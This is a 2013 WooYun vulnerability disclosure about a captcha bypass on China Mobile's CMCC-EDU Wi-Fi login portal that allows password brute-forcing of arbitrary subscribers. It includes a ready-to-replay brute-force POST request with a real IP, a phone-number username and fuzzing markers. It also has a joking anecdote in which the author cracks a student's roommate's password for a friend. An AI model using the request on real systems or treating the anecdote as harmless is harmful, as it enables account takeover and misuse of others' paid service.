漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-046269
漏洞标题:移动cmcc-edu爆破之web指定用户登录上网
相关厂商:中国移动
漏洞作者: Terry
提交时间:2013-12-19 13:20
修复时间:2014-02-02 13:20
公开时间:2014-02-02 13:20
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-12-19: 细节已通知厂商并且等待厂商处理中
2013-12-23: 厂商已经确认,细节仅向厂商公开
2014-01-02: 细节向核心白帽子及相关领域专家公开
2014-01-12: 细节向普通白帽子公开
2014-01-22: 细节向实习白帽子公开
2014-02-02: 细节向公众公开
简要描述:
虽然有验证码,抓下包就可以绕过了。
详细说明:
由于是通过cookie中的JSESSIONID字段来判断是否启用验证码,因此可以直接绕过爆破。理论上可以指定任意开通了移动随e行的用户进行爆破上网消费。话说上次微信上认识的学校一妹子跟我借号(知道名字,查裤子),就邪恶了的破解了她上铺妹子的密码给她,后来听说她上铺的妹子要杀了偶。。好了,不扯淡了。
漏洞证明:
天冷懒得打字了..
post包如下:
POST /authServlet HTTP/1.1
Host: 211.138.195.31
Proxy-Connection: keep-alive
Content-Length: 557
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://211.138.195.31
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://211.138.195.31/style/university/index.jsp?paramStr=UGGOtheTLCd5n%2B%2B2vBMsS2NdeJyCC%2FxUjXdcIcjWPrCmhax1gjqeoAo8j8t8Q2aHVgsuZ%2FrNAM%2Fn%0A6M6MI0Wy8xoNcgg3gm%2BCFa7njQ2IsfgIT07tav4gmkV3YaJk2R6lJLDWGcpMYiZMzk0xR8ibWci%2B%0AX3vYRABnFNPST%2Bt1q8lDbvob3dvahfuN6MDWQh58wi38RTprywaWjRjNijP4iwKPhhWSGlhuhRjI%0AvWz5J%2BTQgbx07FqsWXpoamFAsaVPiRxivK%2F9gFHxwIvc1M2sKbhwAUteiIvxUuZoZ3Seyg6jq1u2%0Amyk59weh86GLqone%2FuybDj6i3cY9aKS1u20WaIHc7NfU03E4dJkLUc5xW9DbPh6PNUBvMO4ExH4t%0A5Bvh20poOuTJZZ82eQuxMdynPQ%3D%3D
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: sysinfo978814272=21; sto-id-20480=ALFAIFKMJABP; JSESSIONID=§gD95Sh§7T1rlMbLLmBLnxLXmJmndQ3HTp8Qg1LhnqL426Qj7Wm1Wh!112508698
paramStr=UGGOtheTLCd5n%2B%2B2vBMsS2NdeJyCC%2FxUjXdcIcjWPrCmhax1gjqeoAo8j8t8Q2aHVgsuZ%2FrNAM%2Fn%0D%0A6M6MI0Wy8xoNcgg3gm%2BCFa7njQ2IsfgIT07tav4gmkV3YaJk2R6lJLDWGcpMYiZMzk0xR8ibWci%2B%0D%0AX3vYRABnFNPST%2Bt1q8lDbvob3dvahfuN6MDWQh58wi38RTprywaWjRjNijP4iwKPhhWSGlhuhRjI%0D%0AvWz5J%2BTQgbx07FqsWXpoamFAsaVPiRxivK%2F9gFHxwIvc1M2sKbhwAUteiIvxUuZoZ3Seyxg6jq1u2%0D%0Amyk59weh86GLqone%2FuybDj6i3cY9aKS1u20WaIHc7NfU03E4dJkLUc5xW9DbPh6PNUBvMO4ExH4t%0D%0A5Bvh20poOuTJZZ82eQuxMdynPQ%3D%3D&UserType=1&province=&pwdType=1&UserName=15806185154&PassWord=§bgdfgdfgd§&verifycode1=
爆破时cookie字段可以不需要,必要的是paramStr字段,这个值每段时间会变,爆破时需要重新抓包。时间原因,就贴个视频吧,以前录得
http://pan.baidu.com/s/17YK2a
修复方案:
加强验证
版权声明:转载请注明来源 Terry@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2013-12-23 21:36
厂商回复:
最新状态:
暂无